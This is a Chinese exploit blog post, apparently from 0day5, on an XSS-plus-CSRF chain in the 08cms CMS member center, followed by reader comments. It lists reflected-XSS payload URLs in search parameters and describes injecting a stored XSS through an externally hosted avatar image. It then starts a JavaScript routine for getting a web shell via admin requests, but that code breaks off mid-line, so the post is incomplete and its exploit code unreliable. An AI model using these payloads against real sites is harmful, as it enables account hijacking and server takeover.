08cms会员中心xss+csrf可getshell

这个属于本站原创,很难看到的哦 首先是在搜索出存在反射性的跨站 搜索处存在反射性xss [php] http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1&djto=1prompt(968256) http://0day5.com/search.php?caid=2&ccid1=208&chid=4&djfrom=1prompt(981700)&djto=1 http://0day5.com/search.php?caid=4&chid=2&mchid=1&zjfrom=1prompt(966559)&zjto=1 http://0day5.com/search.php?caid=4&chid=2&mchid=1&zjfrom=1&zjto=1prompt(922207) [/php] 会员中心adminm.php?action=memberinfo 修改头像的时候发现可以外部调用,仅仅是检查了后缀,然后在附件的地方插入 [php] http://0day5.com/">adminc/images/logo_member.png[/php] 返回我的首页,发现成功的触发了xss 然后在后台测试,发现了两种不同的getshell的办法 针对3.0以前的附上js脚本,3.0以后的没条件测试。通过演示站目测的。不行就算了 [php] function ajax(){ var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i

5 条评论

  1. hackex

    能否加下您下QQ 交流下!!!

  2. hackex

    哥们,你的这个看完了,但还是不明白是怎么操作的,有点乱感觉!能否加你QQ请教一下呢?

    1. 0day5
      @hackex

      唔,就是会员中心的xss

  3. ddd

    :eek: 你后面的JS代码提交到的是后台啊。这个要后台权限吧?既然有后台权限了。那模板里直接都可以写PHP哇。何必这么麻烦搞这个呢~~

    1. 0day5
      @ddd

      是啊,一次性到位.那你认为csrf是干嘛的,其实就是把复杂的步骤简单化

发表评论